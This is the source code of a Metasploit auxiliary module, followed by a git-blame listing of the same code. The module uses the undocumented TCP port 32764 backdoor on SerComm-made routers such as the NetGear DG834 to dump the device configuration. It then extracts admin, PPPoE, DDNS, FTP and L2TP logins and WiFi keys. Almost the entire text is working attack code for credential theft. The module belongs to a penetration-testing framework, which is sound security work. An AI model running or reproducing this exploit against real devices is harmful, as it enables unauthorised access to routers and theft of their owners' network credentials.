modules/auxiliary/admin/misc/sercomm_dump_config.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/auxiliary/report'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  SETTINGS = {
    'Creds' => [
      [ 'HTTP Web Management', { 'user' => /http_username=(\S+)/i, 'pass' => /http_password=(\S+)/i } ],
      [ 'HTTP Web Management Login', { 'user' => /login_username=(\S+)/i, 'pass' => /login_password=(\S+)/i } ],
      [ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ],
      [ 'PPPoA', { 'user' => /pppoa_username=(\S+)/i, 'pass' => /pppoa_password=(\S+)/i } ],
      [ 'DDNS', { 'user' => /ddns_user_name=(\S+)/i, 'pass' => /ddns_password=(\S+)/i } ],
      [ 'CMS', {'user' => /cms_username=(\S+)/i, 'pass' => /cms_password=(\S+)/i } ], # Found in some cameras
      [ 'BigPondAuth', {'user' => /bpa_username=(\S+)/i, 'pass' => /bpa_password=(\S+)/i } ], # Telstra
      [ 'L2TP', { 'user' => /l2tp_username=(\S+)/i, 'pass' => /l2tp_password=(\S+)/i } ],
      [ 'FTP', { 'user' => /ftp_login=(\S+)/i, 'pass' => /ftp_password=(\S+)/i } ],
    ],
    'General' => [
      ['Wifi SSID', /wifi_ssid=(\S+)/i],
      ['Wifi Key 1', /wifi_key1=(\S+)/i],
      ['Wifi Key 2', /wifi_key2=(\S+)/i],
      ['Wifi Key 3', /wifi_key3=(\S+)/i],
      ['Wifi Key 4', /wifi_key4=(\S+)/i],
      ['Wifi PSK PWD', /wifi_psk_pwd=(\S+)/i]
    ]
  }

  attr_accessor :endianess
  attr_accessor :credentials

  def initialize(info={})
    super(update_info(info,
      'Name'           => "SerComm Device Configuration Dump",
      'Description'    => %q{
        This module will dump the configuration of several SerComm devices. These devices
        typically include routers from NetGear and Linksys. This module was tested
        successfully against the NetGear DG834 series ADSL modem router.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
        ],
      'References'     =>
        [
          [ 'OSVDB', '101653' ],
          [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
        ],
      'DisclosureDate' => "Dec 31 2013" ))

      register_options(
        [
          Opt::RPORT(32764),
        ])
  end

  def run
    print_status("Attempting to connect and check endianess...")
    @endianess = fingerprint_endian
    @credentials = {}

    if endianess.nil?
      print_error("Failed to check endianess, aborting...")
      return
    end
    print_good("#{string_endianess} device found...")

    print_status("Attempting to connect and dump configuration...")
    config = dump_configuration

    if config.nil?
      print_status("Error retrieving configuration, aborting...")
      return
    end

    loot_file = store_loot("router.config", "text/plain", rhost, config[:data], "#{rhost}router_config.txt", "Router Configurations")
    print_good("Router configuration dump stored in: #{loot_file}")

    parse_configuration(config[:data])
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  private

  def little_endian?
    return endianess == 'LE'
  end

  def big_endian?
    return endianess == 'BE'
  end

  def string_endianess
    if little_endian?
      return "Little Endian"
    elsif big_endian?
      return "Big Endian"
    end

    return nil
  end


  def fingerprint_endian
    begin
      connect
      sock.put(Rex::Text.rand_text(5))
      res = sock.get_once(-1, 10)
      disconnect
    rescue Rex::ConnectionError => e
      print_error("Connection failed: #{e.class}: #{e}")
      return nil
    end

    unless res
      return nil
    end

    if res.start_with?("MMcS")
      return 'BE'
    elsif res.start_with?("ScMM")
      return 'LE'
    end

    return nil
  end

  def dump_configuration
    if big_endian?
      pkt = [0x4d4d6353, 0x01, 0x00].pack("NVV")
    elsif little_endian?
      pkt = [0x4d4d6353, 0x01, 0x00].pack("VNN")
    else
      return nil
    end

    connect
    sock.put(pkt)
    res = sock.get_once(-1, 10)

    disconnect

    if res.blank?
      vprint_error("No answer...")
      return
    end

    if big_endian?
      mark, zero, length, data = res.unpack("NVVa*")
    else
      mark, zero, length, data = res.unpack("VNNa*")
    end

    unless mark == 0x4d4d6353
      vprint_error("Incorrect mark when reading response")
      return nil
    end

    unless zero == 0
      vprint_error("Incorrect zero when reading response")
      return nil
    end

    unless length == data.length
      vprint_warning("Inconsistent length / data packet")
      # return nil
    end

    return { :length => length, :data => data }
  end

  def parse_configuration(data)
    configs = data.split(?\x00)

    if datastore['VERBOSE']
      vprint_status('All configuration values:')
      configs.sort.each do |i|
        if i.strip.match(/.*=\S+/)
          vprint_status(i)
        end
      end
    end

    configs.each do |config|
      parse_general_config(config)
      parse_auth_config(config)
    end

    @credentials.each do |k,v|
      next unless v[:user] and v[:password]
      print_good("#{k}: User: #{v[:user]} Pass: #{v[:password]}")
      report_cred(
        ip: rhost,
        port: rport,
        user: v[:user],
        password: v[:password],
        service_name: 'sercomm',
        proof: v.inspect
      )
    end

  end

  def parse_general_config(config)
    SETTINGS['General'].each do |regex|
      if config.match(regex[1])
        value = $1
        print_status("#{regex[0]}: #{value}")
      end
    end
  end

  def parse_auth_config(config)
    SETTINGS['Creds'].each do |cred|
      @credentials[cred[0]] = {} unless @credentials[cred[0]]

      # find the user/pass
      if config.match(cred[1]['user'])
        @credentials[cred[0]][:user] = $1
      end

      if config.match(cred[1]['pass'])
        @credentials[cred[0]][:password] = $1
      end

    end
  end
end
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`require 'msf/core/auxiliary/report'`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Auxiliary::Report`

Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`SETTINGS = {`
			`'Creds' => [`
			`[ 'HTTP Web Management', { 'user' => /http_username=(\S+)/i, 'pass' => /http_password=(\S+)/i } ],`
Save some parsing 2014-01-14 17:00:00 -06:00			`[ 'HTTP Web Management Login', { 'user' => /login_username=(\S+)/i, 'pass' => /login_password=(\S+)/i } ],`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`[ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ],`
Added some additional creds that were useful 2014-01-13 23:15:51 -05:00			`[ 'PPPoA', { 'user' => /pppoa_username=(\S+)/i, 'pass' => /pppoa_password=(\S+)/i } ],`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`[ 'DDNS', { 'user' => /ddns_user_name=(\S+)/i, 'pass' => /ddns_password=(\S+)/i } ],`
Added some additional creds that were useful 2014-01-13 23:15:51 -05:00			`[ 'CMS', {'user' => /cms_username=(\S+)/i, 'pass' => /cms_password=(\S+)/i } ], # Found in some cameras`
			`[ 'BigPondAuth', {'user' => /bpa_username=(\S+)/i, 'pass' => /bpa_password=(\S+)/i } ], # Telstra`
			`[ 'L2TP', { 'user' => /l2tp_username=(\S+)/i, 'pass' => /l2tp_password=(\S+)/i } ],`
			`[ 'FTP', { 'user' => /ftp_login=(\S+)/i, 'pass' => /ftp_password=(\S+)/i } ],`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`],`
			`'General' => [`
			`['Wifi SSID', /wifi_ssid=(\S+)/i],`
			`['Wifi Key 1', /wifi_key1=(\S+)/i],`
			`['Wifi Key 2', /wifi_key2=(\S+)/i],`
			`['Wifi Key 3', /wifi_key3=(\S+)/i],`
Add filter to output WPA-PSK password on Netgear DG834GT 2014-04-26 15:52:31 +02:00			`['Wifi Key 4', /wifi_key4=(\S+)/i],`
			`['Wifi PSK PWD', /wifi_psk_pwd=(\S+)/i]`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`]`
			`}`

			`attr_accessor :endianess`
Save some parsing 2014-01-14 17:00:00 -06:00			`attr_accessor :credentials`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "SerComm Device Configuration Dump",`
			`'Description' => %q{`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`This module will dump the configuration of several SerComm devices. These devices`
Add the test info for sercomm_dump_config 2014-01-13 14:27:03 -06:00			`typically include routers from NetGear and Linksys. This module was tested`
			`successfully against the NetGear DG834 series ADSL modem router.`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
yard doc and comment corrections for auxiliary 2015-04-03 16:12:23 +05:00			`'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc`
			`'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`],`
			`'References' =>`
			`[`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '101653' ],`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`[ 'URL', 'https://github.com/elvanderb/TCP-32764' ]`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`],`
			`'DisclosureDate' => "Dec 31 2013" ))`

			`register_options(`
			`[`
			`Opt::RPORT(32764),`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`end`

			`def run`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Attempting to connect and check endianess...")`
Undo debugging comment 2014-01-14 17:02:30 -06:00			`@endianess = fingerprint_endian`
Save some parsing 2014-01-14 17:00:00 -06:00			`@credentials = {}`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`if endianess.nil?`
			`print_error("Failed to check endianess, aborting...")`
			`return`
			`end`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_good("#{string_endianess} device found...")`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Attempting to connect and dump configuration...")`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`config = dump_configuration`

			`if config.nil?`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Error retrieving configuration, aborting...")`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`return`
			`end`

			`loot_file = store_loot("router.config", "text/plain", rhost, config[:data], "#{rhost}router_config.txt", "Router Configurations")`
OCD - store_loot & print_good 2017-07-19 13:02:49 +01:00			`print_good("Router configuration dump stored in: #{loot_file}")`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00
			`parse_configuration(config[:data])`
			`end`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00
Use metasploit-credential API instead of report_auth_info 2015-07-22 01:11:43 -05:00			`def report_cred(opts)`
			`service_data = {`
			`address: opts[:ip],`
			`port: opts[:port],`
			`service_name: opts[:service_name],`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id`
			`}`

			`credential_data = {`
			`origin_type: :service,`
			`module_fullname: fullname,`
			`username: opts[:user],`
			`private_data: opts[:password],`
			`private_type: :password`
			`}.merge(service_data)`

			`login_data = {`
			`core: create_credential(credential_data),`
			`status: Metasploit::Model::Login::Status::UNTRIED,`
			`proof: opts[:proof]`
			`}.merge(service_data)`

			`create_credential_login(login_data)`
			`end`

Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`private`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`def little_endian?`
			`return endianess == 'LE'`
			`end`

			`def big_endian?`
			`return endianess == 'BE'`
			`end`

			`def string_endianess`
			`if little_endian?`
			`return "Little Endian"`
			`elsif big_endian?`
			`return "Big Endian"`
			`end`

			`return nil`
			`end`


			`def fingerprint_endian`
			`begin`
			`connect`
			`sock.put(Rex::Text.rand_text(5))`
Correct sock.get() to sock.get_once() to prevent indefinite hangs/misuse 2014-06-28 16:06:46 -05:00			`res = sock.get_once(-1, 10)`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`disconnect`
			`rescue Rex::ConnectionError => e`
			`print_error("Connection failed: #{e.class}: #{e}")`
			`return nil`
			`end`

			`unless res`
			`return nil`
			`end`

			`if res.start_with?("MMcS")`
			`return 'BE'`
			`elsif res.start_with?("ScMM")`
			`return 'LE'`
			`end`

			`return nil`
			`end`

			`def dump_configuration`
			`if big_endian?`
Made fixes from the PR from jvazquez-r7 2014-01-09 15:33:04 -05:00			`pkt = [0x4d4d6353, 0x01, 0x00].pack("NVV")`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`elsif little_endian?`
Made fixes from the PR from jvazquez-r7 2014-01-09 15:33:04 -05:00			`pkt = [0x4d4d6353, 0x01, 0x00].pack("VNN")`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`else`
			`return nil`
			`end`

			`connect`
			`sock.put(pkt)`
Fix incorrect use of sock.get that leads to indefinite hang 2014-06-28 15:48:58 -05:00			`res = sock.get_once(-1, 10)`
Made fixes from the PR from jvazquez-r7 2014-01-09 15:33:04 -05:00
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`disconnect`

Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`if res.blank?`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`vprint_error("No answer...")`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`return`
			`end`

Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`if big_endian?`
			`mark, zero, length, data = res.unpack("NVVa*")`
			`else`
			`mark, zero, length, data = res.unpack("VNNa*")`
			`end`

			`unless mark == 0x4d4d6353`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`vprint_error("Incorrect mark when reading response")`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`return nil`
			`end`

			`unless zero == 0`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`vprint_error("Incorrect zero when reading response")`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`return nil`
			`end`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`unless length == data.length`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`vprint_warning("Inconsistent length / data packet")`
yard doc and comment corrections for auxiliary 2015-04-03 16:12:23 +05:00			`# return nil`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`end`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`return { :length => length, :data => data }`
			`end`
Code Review Feedback 2014-01-09 10:14:34 -05:00
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`def parse_configuration(data)`
			`configs = data.split(?\x00)`

			`if datastore['VERBOSE']`
Code Review Feedback 2014-01-09 09:19:13 -05:00			`vprint_status('All configuration values:')`
			`configs.sort.each do \|i\|`
			`if i.strip.match(/.*=\S+/)`
			`vprint_status(i)`
			`end`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`end`
			`end`

Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`configs.each do \|config\|`
			`parse_general_config(config)`
Save some parsing 2014-01-14 17:00:00 -06:00			`parse_auth_config(config)`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`end`
Save some parsing 2014-01-14 17:00:00 -06:00
			`@credentials.each do \|k,v\|`
			`next unless v[:user] and v[:password]`
print_status -> print_good. [When it is successful, show it!] 2017-07-14 00:09:35 +01:00			`print_good("#{k}: User: #{v[:user]} Pass: #{v[:password]}")`
Use metasploit-credential API instead of report_auth_info 2015-07-22 01:11:43 -05:00			`report_cred(`
			`ip: rhost,`
			`port: rport,`
			`user: v[:user],`
			`password: v[:password],`
			`service_name: 'sercomm',`
			`proof: v.inspect`
			`)`
Save some parsing 2014-01-14 17:00:00 -06:00			`end`

Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`end`

			`def parse_general_config(config)`
			`SETTINGS['General'].each do \|regex\|`
			`if config.match(regex[1])`
			`value = $1`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("#{regex[0]}: #{value}")`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`end`
			`end`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`end`
Code Review Feedback 2014-01-09 10:14:34 -05:00
Save some parsing 2014-01-14 17:00:00 -06:00			`def parse_auth_config(config)`
Clean sercomm_dump_config 2014-01-09 13:42:11 -06:00			`SETTINGS['Creds'].each do \|cred\|`
Save some parsing 2014-01-14 17:00:00 -06:00			`@credentials[cred[0]] = {} unless @credentials[cred[0]]`
Code Review Feedback 2014-01-09 10:14:34 -05:00
			`# find the user/pass`
Save some parsing 2014-01-14 17:00:00 -06:00			`if config.match(cred[1]['user'])`
			`@credentials[cred[0]][:user] = $1`
Code Review Feedback 2014-01-09 10:14:34 -05:00			`end`

Save some parsing 2014-01-14 17:00:00 -06:00			`if config.match(cred[1]['pass'])`
			`@credentials[cred[0]][:password] = $1`
Code Review Feedback 2014-01-09 10:14:34 -05:00			`end`
Fixed the credential parsing and made output consistent 2014-01-13 22:57:25 -05:00
Code Review Feedback 2014-01-09 10:14:34 -05:00			`end`
Added module to enumerate certain Sercomm devices through backdoor 2014-01-02 20:42:42 -05:00			`end`
			`end`